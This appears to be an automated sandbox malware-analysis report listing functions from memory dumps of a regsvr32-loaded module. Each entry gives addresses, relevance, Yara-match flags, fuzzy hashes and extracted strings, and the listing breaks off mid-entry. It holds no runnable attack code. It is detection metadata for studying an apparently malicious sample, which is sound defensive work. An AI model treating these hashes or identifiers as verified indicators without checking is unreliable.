                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: -+NaNinf00e00E0assertion failed: ndigits > 0$assertion failed: buf.len() >= maxlen
                                                                  • API String ID: 0-2939795802
                                                                  • Opcode ID: 7b6dc00d2d7f62fa412915be49cf29412804173e542e6c203b50343609d37927
                                                                  • Instruction ID: 872eaf6fde09da9edcd75addf9e3adce6dc69ea65967f65cb286fd6d3c8a4ca2
                                                                  • Opcode Fuzzy Hash: 7b6dc00d2d7f62fa412915be49cf29412804173e542e6c203b50343609d37927
                                                                  • Instruction Fuzzy Hash: 66D18A729193408BD304CF19C48179ABBE5BFC8318F148A2EF8D8577A8D7B9D945CB86
                                                                  Function 04F9E5F0 Relevance: 2.2, Strings: 1, Instructions: 998COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: e7151c537666865e6595d4079c1f208c3c689ae74a9ea064726b3261d3ade884
                                                                  • Instruction ID: 35191fbf1c5271b70e70d6a1377023e0bd102bcd2fa99e3d2db070f132ce0b34
                                                                  • Opcode Fuzzy Hash: e7151c537666865e6595d4079c1f208c3c689ae74a9ea064726b3261d3ade884
                                                                  • Instruction Fuzzy Hash: 9662B531618F498BEF69DF28C8856A973E1FB98714F14462DD88BC7251EB34F9438B81
                                                                  Function 6C93A330 Relevance: 2.1, Strings: 1, Instructions: 811COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • 0x0b00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19, xrefs: 6C93A68D, 6C93A7DD, 6C93A965, 6C93AB25, 6C93AD55
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0x0b00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19
                                                                  • API String ID: 0-4248292056
                                                                  • Opcode ID: b065f88257bbf051da1211489a5f22bd01e935affeeb0ad2002216c85dc71544
                                                                  • Instruction ID: 836fb199054fc8c5ee86dfdc110c9c37d0dd89ec4bfff993effe4a921f5984d1
                                                                  • Opcode Fuzzy Hash: b065f88257bbf051da1211489a5f22bd01e935affeeb0ad2002216c85dc71544
                                                                  • Instruction Fuzzy Hash: 7A529A71A042289FEB248FA4C851BFE7BF5EF51304F04817DD989AB6C2CB798949C791
                                                                  Function 6C9328C0 Relevance: 2.1, APIs: 1, Instructions: 802COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memcmp.MSVCRT(00000001,00000001,?), ref: 6C932A6F
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcmp
                                                                  • String ID:
                                                                  • API String ID: 1475443563-0
                                                                  • Opcode ID: b7033bc16d9f63f25abd9cc9053e4debb9fdf494d2f2bfde627f8b12c87ba1b5
                                                                  • Instruction ID: 6255e18ca6b9d4aab69f99399adae6d4d6788ea69e39363f115039c8d714e3fa
                                                                  • Opcode Fuzzy Hash: b7033bc16d9f63f25abd9cc9053e4debb9fdf494d2f2bfde627f8b12c87ba1b5
                                                                  • Instruction Fuzzy Hash: 92620671E0462A8FDB11CF78C8807AEBBB6BF9A304F159319E859B7741D731D9428B90
                                                                  Function 6C87E870 Relevance: 1.7, Strings: 1, Instructions: 419COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • CurrentBuildNumberCurrentMajorVersionNumber (), xrefs: 6C87E874
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CurrentBuildNumberCurrentMajorVersionNumber ()
                                                                  • API String ID: 0-3310863298
                                                                  • Opcode ID: 6698d000c09f388c0fbfd00423723615706a7dc3e14319de2b0053ce217ceab7
                                                                  • Instruction ID: 3ff68ac2fc1799df5f45fb066a10a903b225ab1b9db289c03375fa34e3ac09be
                                                                  • Opcode Fuzzy Hash: 6698d000c09f388c0fbfd00423723615706a7dc3e14319de2b0053ce217ceab7
                                                                  • Instruction Fuzzy Hash: 91F1C271E002198FDB34CFA9C5907EEBBB2FF89314F198529D855AB781E3749941CBA0
                                                                  Function 6C8EC8C0 Relevance: 1.6, Strings: 1, Instructions: 382COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ?
                                                                  • API String ID: 0-1684325040
                                                                  • Opcode ID: a2102e5965dcb69561bb539519eab756d198fe10cbe65145c14382c6bf2622dc
                                                                  • Instruction ID: bbbc284d311f9410907fdb20ce56d2b61d013ca4021fa7ecdc46532e18b3f00d
                                                                  • Opcode Fuzzy Hash: a2102e5965dcb69561bb539519eab756d198fe10cbe65145c14382c6bf2622dc
                                                                  • Instruction Fuzzy Hash: 7CE127B1E052298FD720EF68C5907ADBFB2BF8F304F298A69C4656B752D7709841C790
                                                                  Function 6C93C0A0 Relevance: 1.6, Strings: 1, Instructions: 377COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • 0x0b00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19, xrefs: 6C93C20F, 6C93C415
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0x0b00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19
                                                                  • API String ID: 0-4248292056
                                                                  • Opcode ID: 622ef2235633c75d87cc31be9cdcb1d361b23cebf5524e78b7e5635194ce298b
                                                                  • Instruction ID: ce91f079726cc2add97602059353b402de3313e1c72f9b97286907940601e2f5
                                                                  • Opcode Fuzzy Hash: 622ef2235633c75d87cc31be9cdcb1d361b23cebf5524e78b7e5635194ce298b
                                                                  • Instruction Fuzzy Hash: 0AC19C32B042358FE7249A2CC8857FA77A6EF85710F14933AE88D9B7C5D639CA45C391
                                                                  Function 6C8C9FC0 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ?
                                                                  • API String ID: 0-1684325040
                                                                  • Opcode ID: b1f897a1c2db203fc9172d613e6f1495ebea03d0bb11d6a64f03c338ac499f87
                                                                  • Instruction ID: c3a2bd8a934fc220409cb62ccf0916a9e23c4411b399bfe168309f52b232d0a2
                                                                  • Opcode Fuzzy Hash: b1f897a1c2db203fc9172d613e6f1495ebea03d0bb11d6a64f03c338ac499f87
                                                                  • Instruction Fuzzy Hash: 3BC12471E0121A8BDB24CFA8C9506EEF7B1FF45314F248729E825ABB80E775D941CB91
                                                                  Function 6C861B10 Relevance: 1.6, APIs: 1, Instructions: 65comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(6C978E20,00000000,00000001,6C978E10,00000000), ref: 6C861B44
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID:
                                                                  • API String ID: 542301482-0
                                                                  • Opcode ID: 62ebbff50809526680d8be99985b2d1352853212512541dbdb4579ea46557dfd
                                                                  • Instruction ID: e5ea5c19a3a86b14fed89be56cd98cf5f1de2942fe72f1ccd1195d3ce5605297
                                                                  • Opcode Fuzzy Hash: 62ebbff50809526680d8be99985b2d1352853212512541dbdb4579ea46557dfd
                                                                  • Instruction Fuzzy Hash: D51136B0D0060AA7EB20CFAADD44BEFB3B8AF51308F108939D41466E02F775D54887E1
                                                                  Function 0263AFAE Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00009F6C), ref: 0263AFB3
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 2c83123e9dfe7c134bcfb8798860b3e4b76d282f5c09fcb92c71eb0836ab73d7
                                                                  • Instruction ID: b797f22e7728b3b33d56c437cb639090b601e2dc3dcf4522b1616352d2815033
                                                                  • Opcode Fuzzy Hash: 2c83123e9dfe7c134bcfb8798860b3e4b76d282f5c09fcb92c71eb0836ab73d7
                                                                  • Instruction Fuzzy Hash: DF9002E9A911405BA71117B0580D50936D05F68A127C11854A0C7C4114DB5058956551
                                                                  Function 6C85EFD0 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: l)\%
                                                                  • API String ID: 0-975318231
                                                                  • Opcode ID: ca9a847b4f3db288acb7fd5dbf7504a9e9efd1eda35e5247aff6cb4fe1b157ee
                                                                  • Instruction ID: 69fa98216291b3a6d433ee95c5e42fb101bfc0f97e4343c28d081d27b447ce2a
                                                                  • Opcode Fuzzy Hash: ca9a847b4f3db288acb7fd5dbf7504a9e9efd1eda35e5247aff6cb4fe1b157ee
                                                                  • Instruction Fuzzy Hash: E4813A72E083119BD308CF65C89075FF7E2AFC8714F1ACA3EA89897244D7B4D8419A82
                                                                  Function 6C92D6E0 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • -+NaNinf00e00E0assertion failed: ndigits > 0, xrefs: 6C92D819
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: -+NaNinf00e00E0assertion failed: ndigits > 0
                                                                  • API String ID: 2221118986-3557657957
                                                                  • Opcode ID: c1ddc88e18bc8352170657884a9207e4e737dfb642e75b5e3d316ba5b9852d1b
                                                                  • Instruction ID: 9680c217ec916417d2f5d772060341ea734f68577e8fca6c0cbd4ec4107691c9
                                                                  • Opcode Fuzzy Hash: c1ddc88e18bc8352170657884a9207e4e737dfb642e75b5e3d316ba5b9852d1b
                                                                  • Instruction Fuzzy Hash: 33619EB29193008BD300CE19C88175BB7E9EFC9318F548A2EF4E897794D7B9D945CB82
                                                                  Function 6C896D50 Relevance: .6, Instructions: 574COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8688d7a5e63681c8ba26b86f2aed978e8ec8f0a622854f98c2bc60acff6f6b90
                                                                  • Instruction ID: 39e5cd0dc1bdf30e03d7710dec1cf61e1ece4367a0d6876624e94815c7dd42be
                                                                  • Opcode Fuzzy Hash: 8688d7a5e63681c8ba26b86f2aed978e8ec8f0a622854f98c2bc60acff6f6b90
                                                                  • Instruction Fuzzy Hash: 1F429E72C11B588FCB11CF54C880ADAB7B5FF9A354F06469AE8097F622DB70E945CB90
                                                                  Function 04F82B85 Relevance: .5, Instructions: 479COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3258a50e5650563d70db5156f58ea88c102a1120cd99d253f35d355558781531
                                                                  • Instruction ID: 13a395b2a4095e423e29841214ee634d99f4822f2b1fba27b6761566426c2c85
                                                                  • Opcode Fuzzy Hash: 3258a50e5650563d70db5156f58ea88c102a1120cd99d253f35d355558781531
                                                                  • Instruction Fuzzy Hash: C72236B4A00B059FDB24DF68C984AAABBF1FF48304F118A6DD85A9B751D730F942CB50
                                                                  Function 026324B0 Relevance: .5, Instructions: 479COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9ef32cea41392b6c269e894d3ebf8e47fbc880b5cc681ca769ed0986be4e5704
                                                                  • Instruction ID: bd8a7c6659de89f4f3c43e517fb5a9b1566226a7f9329c220351649aa2eab851
                                                                  • Opcode Fuzzy Hash: 9ef32cea41392b6c269e894d3ebf8e47fbc880b5cc681ca769ed0986be4e5704
                                                                  • Instruction Fuzzy Hash: 682259B0A00B05DFDB29CF69C590AAABBF1FF48304F248A6DD85A97755D730E941CB90
                                                                  Function 04F9CF08 Relevance: .4, Instructions: 429COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
                                                                  • Instruction ID: c2927590cec753e5ec479fdb0b05317197056962312c0a8fc0706200f239fccf
                                                                  • Opcode Fuzzy Hash: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
                                                                  • Instruction Fuzzy Hash: CBD16631718B498BEF68DF68D849AADB7E5FB58705F10422DD84BC3250DF34E9528B81
                                                                  Function 04F9E1C0 Relevance: .4, Instructions: 405COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                                  • Instruction ID: 1dccef8cb21e36b5386d73aac26a876969c809443c89d691966362e766a8156e
                                                                  • Opcode Fuzzy Hash: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                                  • Instruction Fuzzy Hash: F6D13D31518A488BDF59DF28C889AEAB7E1FF98310F14466DE84ACB155EF30E946CB41
                                                                  Function 04F9DDE4 Relevance: .4, Instructions: 382COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                                  • Instruction ID: 2c99fc6a52e2593ece6c8e0f5f5e684088348905184981ab900f477660b42dad
                                                                  • Opcode Fuzzy Hash: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                                  • Instruction Fuzzy Hash: 9EB18430714A099BEF59EF28C8957B9B3D1FB98304F644169D84AC7295EB20FC47CB91
                                                                  Function 6C942280 Relevance: .4, Instructions: 372COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
